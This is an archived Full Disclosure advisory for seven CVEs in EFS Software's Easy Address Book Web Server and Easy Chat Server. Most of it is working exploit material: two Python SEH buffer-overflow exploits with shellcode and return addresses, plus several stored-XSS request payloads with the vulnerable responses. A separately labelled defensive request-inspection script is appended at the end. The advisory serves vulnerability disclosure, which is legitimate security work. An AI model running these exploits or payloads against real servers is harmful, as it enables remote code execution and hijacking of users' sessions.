Full Disclosure mailing list archives
[CVE-2023-4491, CVE-2023-4492, CVE-2023-4493, CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497] Multiple vulnerabilities in EFS Software products
From: Rafael Pedrero <rafael.pedrero () gmail com>
Date: Wed, 30 Aug 2023 12:42:43 +0200
# Exploit Title: Easy Address Book Web Server v1.6 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-10
# CVE: CVE-2023-4491, CVE-2023-4492, CVE-2023-4493
# Vendor Homepage: http://www.efssoft.com/web-address-book-server.html
# Software Link : http://www.efssoft.com/eabws.exe (md5sum: 69f77623bb32589fb5343f598b61bbd9)
# Tested Version: 1.6
# Tested on: Windows 7, 10

# CVE-2023-4491:

Vulnerability Type: searchbook Remote Buffer Overflow
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119

Vulnerability description:
There is a remote stack-based buffer overflow (SEH) in /searchbook.ghp in EFS Software Easy Address Book Web Server 1.6. By sending an overly long username string to /searchbook.ghp for asking the name via POST, an attacker may be able to execute arbitrary code.

Proof of concept:

import socket
import struct

def sendbuff():
    # > arwin.exe kernel32.dll WinExec
    # WinExec is located at 0x776f2c91 in kernel32.dll
    shellcode_WinExec = (
        "\x33\xc0"              # XOR EAX,EAX
        "\x50"                  # PUSH EAX => padding for lpCmdLine
        "\x68\x2E\x65\x78\x65"  # PUSH ".exe"
        "\x68\x63\x61\x6C\x63"  # PUSH "calc"
        "\x8B\xC4"              # MOV EAX,ESP
        "\x6A\x01"              # PUSH 1
        "\x50"                  # PUSH EAX
        "\xBB\x91\x2c\x6f\x77"  # MOV EBX,kernel32.WinExec
        "\xFF\xD3")             # CALL EBX

    shellcode_system = (
        "\x31\xC9"              # xor ecx,ecx
        "\x51"                  # push ecx
        "\x68\x63\x61\x6C\x63"  # push 0x636c6163
        "\x54"                  # push dword ptr esp
        "\xB8\x6f\xb1\xdc\x75"  # mov eax,msvcrt.system
        "\xFF\xD0")             # call eax

    shellcode = shellcode_WinExec

    # SEH
    junk1 = "A"*455
    buffer = junk1
    buffer += "\xeb\x10\x90\x90"                # jmp 0x10 to nops to shellcode
    buffer += struct.pack('<L', 0x1001071e)     # pop/pop/ret @ 0x1001071e SSLEAY32.DLL from !Mona
    buffer += "\x90" * 20
    buffer += shellcode
    junk2 = "D"*(840 - 455 - len(shellcode) - 4 - 4 - 20)
    buffer += junk2
    return buffer

def REQ_POST(padding):
    POST = (
        "POST http://"+str(ip)+"/searchbook.ghp?id=1 HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Content-Length: " + str(108 + len(padding)) + "\r\n"
        "Connection: keep-alive\r\n"
        "Referer: http://"+str(ip)+"/searchcontact.ghp?id=1\r\n"
        "Cookie: SESSIONID=3938; UserID=; PassWD=\r\n"
        "Upgrade-Insecure-Requests: 1\r\n"
        "Host: "+str(ip)+"\r\n\r\n"
        "addrbookid=1&contactid=%3C%21--cid--%3E&cancelflag=0&name=" + padding + "&cancelflag=0&name=AAA&Email=&address=&phone=&other=&search=Start+Search\r\n\r\n"
    )
    return POST

ip = '192.168.X.X'
port = 80
payload = sendbuff()

try:
    print "\n[*] Sending POST (searchbook.ghp) exploit to Easy Address Book Web Server V1.6, length " + str(len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(REQ_POST(payload))
    s.recv(1024)
    s.close()
    print "\n[*] Sended POST length " + str(len(payload))
except:
    print "Connecting error"

# CVE-2023-4492:

Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:
Easy Address Book Web Server v1.6 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /addrbook.ghp (POST method), in multiple parameters.

Proof of concept:

POST http://localhost/addrbook.ghp?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/editcontact.ghp?id=1&cid=12
Cookie: SESSIONID=15337; UserID=; PassWD=
Upgrade-Insecure-Requests: 1
Host: localhost

addrbookid=1&contactid=14&cancelflag=0&firstname=%3C%2Fa%3E%3Cscript%3Ealert%2811%29%3B%3C%2Fscript%3E%3Ca%3E&middlename=demo1&lastname=demo1&nickname=demo1&Email=demo1%40demo1.com&company=demo1&jobtitle=demo1&department=demo1&office=demo1&workphone=&workfax=&workaddress=demo1&workcity=&workstate=&workzip=&workcountry=USA&homephone=&homefax=&homeaddress=demo1&homecity=&homestate=&homezip=&homecountry=USA&mobilephone=&pager=&email2=&email3=&homepage=&notes=demo1&save=Save

Vulnerable parameters: firstname, homephone, lastname, middlename, workaddress, workcity, workcountry, workphone, workstate, workzip

Response:

<TR>
<TD class=row2><SPAN class=genmed><A target=_blank class=genmed href="viewcontact.ghp?id=1&cid=12">demo1 </a><script>alert(1);</script><a> demo1</A></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a href="mailto: demo1 () demo1 com">demo1 () demo1 com</a></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed>demo1, , , , USA</SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a href="editcontact.ghp?id=1&cid=12">Edit</a></SPAN></TD>
<TD class=row2 align=left><SPAN class=genmed><a href="javascript:deletecontact('deletecontact.ghp?id=1&cid=12','demo1 </a><script>alert(1);</script><a> demo1')">Delete</a></SPAN></TD>

# CVE-2023-4493:

Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:
Easy Address Book Web Server v1.6 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /users_admin.ghp (POST method, authenticated Admin user), in multiple parameters.

Proof of concept:

Example 1:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=test&password=test&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&level=user&state=Enable&update_user=Update

Vulnerable parameter: email

Response:

<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15" value="test"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15" value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35" value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><select name="level"><option >guest</option><option selected>user</option><option >power user</option></select></TD>
<TD class=row2 align=left><select name="state"><option selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update" name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>

Example 2:

POST http://localhost/users_admin.ghp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/users_admin.ghp
Cookie: SESSIONID=19655; UserID=Admin; PassWD=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

userid=2&username=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&password=test&email=tt%40fsdfs.com&level=user&state=Enable&update_user=Update

Vulnerable parameter: username

Response:

<form method="POST" action="">
<TR>
<input type="hidden" name="userid" value="2">
<TD class=row2 align=left><input type="text" name="username" size="15" value=""><script>alert(1);</script>"> </TD>
<TD class=row2 align=left><input type="text" name="password" size="15" value=""> </TD>
<TD class=row2 align=left><input type="text" name="email" size="35" value=" tt () fsdfs com"> </TD>
<TD class=row2 align=left><select name="level"><option >guest</option><option selected>user</option><option >power user</option></select></TD>
<TD class=row2 align=left><select name="state"><option selected>Enable</option><option >Disable</option></select></TD>
<TD class=row2 align=left><input type="submit" value="Update" name="update_user"></TD>
<TD class=row2><SPAN class=genmed><A class=genmed href="user_delete_admin.ghp?2">Delete</A></SPAN></TD>
</TR>
</form>

-------------------------------------------------------------------------------------------------------------

# Exploit Title: Easy Chat Server v3.1 - Multiple Vulnerabilities
# Discovery by: Rafael Pedrero
# Discovery Date: 2021-01-09
# CVE: CVE-2023-4494, CVE-2023-4495, CVE-2023-4496, CVE-2023-4497
# Vendor Homepage: http://www.echatserver.com/
# Software Link : http://echatserver.com/ecssetup.exe (md5sum: c682138ebbea9af7948a3f142bbd054b)
# Tested Version: 3.1
# Tested on: Windows 7, 10

# CVE-2023-4494:

Vulnerability Type: register Remote Buffer Overflow
CVSS v3: 9.8
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-119

Vulnerability description:
There is a remote stack-based buffer overflow (SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1. By sending an overly long username string to register.ghp for asking the username via GET, an attacker may be able to execute arbitrary code.

Proof of concept:

import socket

def sendbuff():
    # calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/
    # msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin
    # [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)
    shellcode = (
        "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
        "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
        "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
        "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
        "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
        "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
        "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
        "\x1c\x39\xbd"
    )

    # SEH
    junk1 = "A"*473
    buffer = junk1
    buffer += "\xeb\x06\x90\x90"    # short jmp to shellcode
    buffer += "\x1e\x0e\x01\x10"    # pop/pop/ret @ 0x10010E1E SSLEAY32.DLL from !Mona
    buffer += shellcode
    junk2 = "D"*(600 - 473 - len(shellcode) - 4 - 4)
    buffer += junk2
    return buffer

def REQ_GET(padding):
    GET = (
        "GET /register.ghp?username=" + padding + "&password= HTTP/1.1\r\n"
        "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36\r\n"
        "Host: "+str(ip)+":80\r\n"
        "Accept-Language: es-es\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Referer: http://"+str(ip)+"\r\n"
        "Connection: Keep-Alive\r\n\r\n"
    )
    return GET

ip = '192.168.X.X'  # change the ip address
port = 80
payload = sendbuff()

try:
    print "\n[*] Sending GET (register.ghp) exploit to EFS Easy Chat Server 3.1, length " + str(len(payload))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((ip, port))
    s.send(REQ_GET(payload))
    s.recv(1024)
    s.close()
    print "\n[*] Sended GET length " + str(len(payload))
except:
    print "Connection error"

# CVE-2023-4495:

Vulnerability Type: stored Cross-Site Scripting (XSS) - #1
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:
Easy Chat Server v3.1 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /registresult.htm (POST method), in the Resume parameter. The XSS is loaded from /register.ghp.

Proof of concept:

POST http://localhost/registresult.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 257
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1
Host: localhost

UserName=<redacted>&Password=<redacted>&Password1=demo1&Sex=0&Email=demo1%25252540demo1.com&Icon=0.gif&Resume=%3C%2FTEXTAREA%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3CTEXTAREA%3E&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change

Response:

<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been changed successfully.</center></body>

Go to: http://localhost/register.ghp?username=<redacted>&password=<redacted>

Response - xss:

<TR><TD>
Your profile/interests:<BR>
<TEXTAREA rows="4" cols="30" name="Resume"></TEXTAREA><script>alert(1)</script><TEXTAREA></TEXTAREA>
<INPUT type="hidden" name="cw" value="0">
<INPUT type="hidden" name="RoomID" value="<!--$RoomID-->">
<INPUT type="hidden" name="RepUserName" value="<!--$UserName-->">
</TD></TR>

# CVE-2023-4496:

Vulnerability Type: stored Cross-Site Scripting (XSS) - #2
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:
Easy Chat Server v3.1 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /body2.ghp (POST method), in the mtowho parameter.

Proof of concept:

POST http://localhost/body2.ghp?username=<redacted>&password=<redacted>&room=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/chatsubmit.ghp?username=<redacted>&password=<redacted>&room=4
Upgrade-Insecure-Requests: 1
Host: localhost

staticname=%3A000539&tnewname=&msayinfo=demo+&mnewname=&mtowho=%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Cscript%3E&mfilters=0&mfont=0&mfcolor=1&elist=100&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message=demo+&chat_flag=

Response:

<html>
<head>
</head>
<body>
<script language="JavaScript">
<!--
parent.board.document.body.innerHTML=parent.board.document.body.innerHTML+"<br><font color=green size=2>08:22:16 <a target=chatsubmit href=javascript:parent.chatsubmit.getname('<redacted>');><redacted></a> => <a target=chatsubmit href=javascript:parent.chatsubmit.getname('</script><script>alert(1);</script><script>');></script><script>alert(1);</script><script></a> </font><font color=#000000 size=2>demo </font> <img src=/face/100.gif border=0>";
// -->
</script>
</body>
</html>

# CVE-2023-4497:

Vulnerability Type: stored Cross-Site Scripting (XSS) - #3
CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:
Easy Chat Server v3.1 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via /registresult.htm (POST method), in the Icon parameter. The XSS is loaded from /users.ghp.

Proof of concept:

POST /registresult.htm HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
Origin: http://localhost
Connection: close
Referer: http://localhost/register.ghp?username=<redacted>&password=<redacted>
Upgrade-Insecure-Requests: 1

UserName=<redacted>&Password=<redacted>&Password1=<redacted>&Sex=0&Email=<redacted>%252525252540<redacted>.com&Icon="><script>alert(111)</script><img%20src="1.gif&Resume=AAA&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change

Response:

<BODY bgcolor="#b8d0dc"><center>Congratulations! Your information has been changed successfully.</center></body>

When the user information page loads:

http://localhost/users.ghp?username=<redacted>&password=<redacted>&room=4

<font color="red">[vip room]</font>
<br><br>
[Online users:1]<br><br>[<a href="javascript:parent.chatsubmit.getname('All');" target="chatsubmit">All</a>]
<br><br>
<script>
if(navigator.appName!="Netscape" && parent.chatsubmit.document && parent.chatsubmit.document.readyState == "complete")
parent.chatsubmit.listcolorchange();
</script>
<img src="/images/""><script>alert(111)</script><i>[<a href="javascript:parent.chatsubmit.getname('<redacted>');" target="chatsubmit"><redacted></a>]<==<br>
<br>
<br><br>
[<a href="javascript:OnRegister();">Change infomation</a>]
</i>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
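As an added, defender-side example (not part of the advisory above), the following Python 3 code parses raw HTTP requests of the kind shown in the proofs of concept and flags the two patterns the advisory describes: an oversized value in the parameters that trigger the SEH overflows, and HTML metacharacters in the parameters that are stored and reflected unencoded. The endpoint/parameter table is taken from the advisory; the 256-byte alert threshold and the three sample requests are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints and parameters the advisory reports as overflowing
# (SEH overwrite after 455 bytes on searchbook.ghp, 473 on register.ghp).
OVERFLOW_PARAMS = {"/searchbook.ghp": {"name"}, "/register.ghp": {"username"}}
# Endpoints and parameters the advisory reports as stored/reflected unencoded.
XSS_PARAMS = {
    "/addrbook.ghp": {"firstname", "middlename", "lastname", "workaddress", "workcity",
                      "workcountry", "workphone", "workstate", "workzip", "homephone"},
    "/users_admin.ghp": {"username", "email"},
    "/registresult.htm": {"Resume", "Icon"},
    "/body2.ghp": {"mtowho"},
}
MAX_LEN = 256  # assumed alert threshold, well below the 455/473-byte PoC padding
# A tag start (<script, </a, <!--) or a quote followed by '>' (attribute breakout).
TAG_RE = re.compile(r"<\s*/?[a-z!]|[\"']\s*>", re.I)

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, {param: [values]})."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    parts = urlsplit(target)  # handles both "/x.ghp?q" and "http://host/x.ghp?q"
    params = parse_qs(parts.query, keep_blank_values=True)
    if method == "POST":  # form body is x-www-form-urlencoded in every PoC
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return method, parts.path, params

def inspect_request(raw):
    """Return a list of (rule, parameter) findings for one raw request."""
    _, path, params = parse_request(raw)
    findings = []
    for name, values in params.items():
        for value in values:  # parse_qs already percent-decoded the value
            if name in OVERFLOW_PARAMS.get(path, ()) and len(value) > MAX_LEN:
                findings.append(("oversized-param", name))
            if name in XSS_PARAMS.get(path, ()) and TAG_RE.search(value):
                findings.append(("html-metachars", name))
    return findings

# Constructed sample requests modelled on the advisory's PoCs (not real traffic).
BENIGN = ("POST /addrbook.ghp?id=1 HTTP/1.1\r\nHost: localhost\r\n\r\n"
          "addrbookid=1&firstname=Ana&lastname=O%27Brien&save=Save")
XSS = ("POST http://localhost/addrbook.ghp?id=1 HTTP/1.1\r\nHost: localhost\r\n\r\n"
       "addrbookid=1&firstname=%3C%2Fa%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=demo1")
OVERFLOW = ("GET /register.ghp?username=" + "A" * 473 + "&password= HTTP/1.1\r\n"
            "Host: localhost\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("benign", BENIGN), ("xss", XSS), ("overflow", OVERFLOW)):
        print(label, inspect_request(req))
```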